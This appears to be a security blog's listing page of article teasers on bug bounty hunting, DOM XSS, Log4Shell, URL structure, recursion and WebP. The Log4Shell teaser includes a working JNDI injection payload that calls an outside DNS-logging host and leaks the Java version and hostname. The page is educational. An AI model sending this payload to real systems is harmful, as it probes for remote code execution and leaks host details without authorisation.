Have you recently entered the world of bug bounty hunting and are having trouble locating your first bug? Don’t worry, you’re not alone. It’s a common challenge that requires persistence and dedication. In this article, I have prepared some helpful tips to guide you on your bug bounty journey. First…

Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution — Hello 👋 This is my first and last Bug Bounty Writeup this year. 😀 I am sharing with you my latest XSS finding, which I’ve found 2 weeks ago. This was the fastest and a bit unusual flow that I normally do when I search for XSS. So let’s dive…

Short & Basic Intro to Bug Bounty World — I recommend registering on the following crowdsourced cybersecurity platforms (bug bounty platforms): https://www.bugcrowd.com https://www.hackerone.com https://www.intigriti.com Searching for bugs in the wild (not on a bug bounty platform) can be great, but it may not be the best place to start as there is no guarantee that the company will respond…

How it works, where to practice, and how to identify Description Java logging library, log4j, has an unauthenticated RCE vulnerability if a user-controlled string is logged. CVE-2021–44228 (Log4Shell) Affected versions — Apache log4j 2.0-beta9 ≤ 2.14.1 How It Works Specially crafted payload is injected into Headers, Input Fields, or Query/Body parameters https://target.com/?test=${jndi:ldap://jv-${sys:java.version}-hn-${hostName}.qwe3er.dnslog.cn/exp}

Web Address Example Scheme and its Mandatory Components Explained — URL (Uniform Resource Locator) is the so-called address of the desired resource on the internet that consists of multiple components/parts. Let’s take a look at the following URL https://admin:pass@a.b.web.com:888/users/index.php?q=bob&role=2#info This URL consist of the following components: Scheme https:// Authority admin:pass@

Advantages of recursion technology clarified — As website developers, we encounter recursive functions every day. This tutorial will explore the pattern of problems, which can be solved using recursion. Basic Concept function recurse() { // 2nd call to itself recurse(); } // 1st call recurse(); Each recursive function must have a base case (also called termination condition), where…

WEBP is image compression technology that creates smaller file sizes without compromising on quality It can reduce the file size from 20% to 80% (or even more) compared to JPEG, PNG, and GIF